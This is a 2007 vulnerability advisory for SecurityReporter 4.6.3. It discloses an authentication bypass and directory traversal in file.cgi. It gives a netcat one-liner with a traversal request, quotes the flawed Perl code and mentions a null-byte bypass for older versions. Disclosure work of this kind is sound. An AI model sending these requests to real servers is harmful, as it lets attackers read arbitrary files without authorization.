SECURITYREPORTER - AUTHENTICATION BYPASS AND DIRECTORY TRAVERSAL
VULNERABILITY

Product: SecurityReporter
Version: 4.6.3 Build Date: 04/20/2007
Platform: Win32
Vendor: Secure Computing (www.securecomputing.com) 

Product Description
-------------------

"SecurityReporter is a security event analysis and reporting solution
for the
Sidewinder Security Appliance, providing realtime security intelligence
to help
decipher hacker/virus behavior, combat security threats, and help meet
compliance requirements."

Vendor Description
------------------

SecurityReporter is manufactured under an OEM partnership between
Secure Computing and eIQnetworks. The product is also known as "Network
Security Analyzer". According to eIQnetworks, Security Analyzer is also
part of products of the following companies:

        - Top Layer Networks
        - Clavister
        - Astaro
        - Reflex Security
        - H3C
        - Piolink
        - MiraPoint


Vulnerability-Overview
----------------------

SecurityReporter is vulnerable to an authentication bypass and directory
traversal attack.
It is possible to access files inside and outside the application root
directory from remote without authentication.

During the installation of SecurityReporter it can be chosen between an
dedicated Apache installation (which is included within the install
package) and the usage of an
pre-installed Internet Information Server.

In case of the Apache, access to the files is executed with local system
account privileges by default.


Exploitation
------------

The following request fetches the sourcecode of the script itself, but
can also be used to access any other file on the partition:

echo -e "GET /cgi-bin/file.cgi?name=/eventcache/../cgi-bin/file.cgi
HTTP/1.0\r\n\r\n" | nc  


Vulnerability Details
---------------------

The authentication can be bypassed because of the following code within
"file.cgi":

   	8 $name = $field{'name'};
   	9
	10 #for gif images we dont care about authorization so just  serve it
without
        11 #bothering the reporting engine again. See bug: 3676 for
details.
        12 $dontvalidate = "false";
        13 if ($name =~ /^[a-zA-Z0-9\-\. _\/ ]+\.(gif)$/) {
        14              $dontvalidate = "true";
        15              print "Content-Type: image/gif\n";
        16              binmode STDOUT;
        17 }
        18 elsif ($name =~ /^\/eventcache\//) {
        19                      $dontvalidate = "true";
        20                      print "Content-Type: text/html\n";
        21                      binmode STDOUT;
        22}

If the value of the parameter "name" does not match to line 13 (which
can be enforced by not requesting a ".gif" file) the condition in line
18 is checked.
If the value of "name" does start with the directory "/eventcache/",
$dontvalidate is set to "true", thus disabling uservalidation.

(addition: the regex in line 13 could be bypassed with null-byte attack
in older versions of this application, by requesting a file like
../../../../boot.ini%00.gif. But this is fixed in the current version
within the file GeneralUtilities.pm which is included to most pl-files)

The directory traversal is possible because there is no normalization of
the input and filtering of dots and slashes/backslashes within
"file.cgi":

        165 #on windows 2003 IIS the cur dir is the root itself- dont
know why so we try to open it in
        166 #path relative to root if ../ from cgi-bin fails
        167 open(f, "../$name") or open(f, "$name") or die "File
($name): $!";


PATCH
-----

All SecurityReporter customers have been sent an email by the venodr,
describing the vulnerability with a link to a patch.

Discovered
----------

By Oliver Karow (oliver.karow@gmx.de) on Tuesday, 05. June 2007 
http://www.oliverkarow.de/research/securityreporter.txt